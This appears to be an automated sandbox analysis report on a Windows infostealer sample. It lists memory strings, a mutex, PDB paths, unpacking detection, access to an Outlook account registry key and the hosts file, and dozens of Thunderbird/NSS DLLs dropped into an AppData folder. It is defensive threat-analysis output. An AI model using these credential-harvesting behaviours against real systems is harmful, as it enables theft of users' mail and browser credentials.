Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.1.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.1.dr	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Mutant created: \Sessions\1\BaseNamedObjects\user5L1M3_noturbusiness
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_01

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.1.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.1.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323091495.0000000002DC9000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327457378.000000006E4F9000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.1.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.1.dr
Source:	Binary string: PC:\boguxuram_wizuz\hakekuna.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.1.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327457378.000000006E4F9000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.1.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.1.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr
Source:	Binary string: C:\boguxuram_wizuz\hakekuna.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Unpacked PE file: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Unpacked PE file: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_004000BB push edx; retf
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_004407F0 push ecx; ret

Source: sqlite3.dll.1.dr	Static PE information: section name: /4
Source: sqlite3.dll.1.dr	Static PE information: section name: /19
Source: sqlite3.dll.1.dr	Static PE information: section name: /31
Source: sqlite3.dll.1.dr	Static PE information: section name: /45
Source: sqlite3.dll.1.dr	Static PE information: section name: /57
Source: sqlite3.dll.1.dr	Static PE information: section name: /70
Source: sqlite3.dll.1.dr	Static PE information: section name: /81
Source: sqlite3.dll.1.dr	Static PE information: section name: /92
Source: AccessibleHandler.dll.1.dr	Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.1.dr	Static PE information: section name: .orpc
Source: IA2Marshal.dll.1.dr	Static PE information: section name: .orpc
Source: lgpllibs.dll.1.dr	Static PE information: section name: .rodata
Source: MapiProxy.dll.1.dr	Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.1.dr	Static PE information: section name: .orpc
Source: mozglue.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,

Source: ucrtbase.dll.1.dr

Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 7.9745561755

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
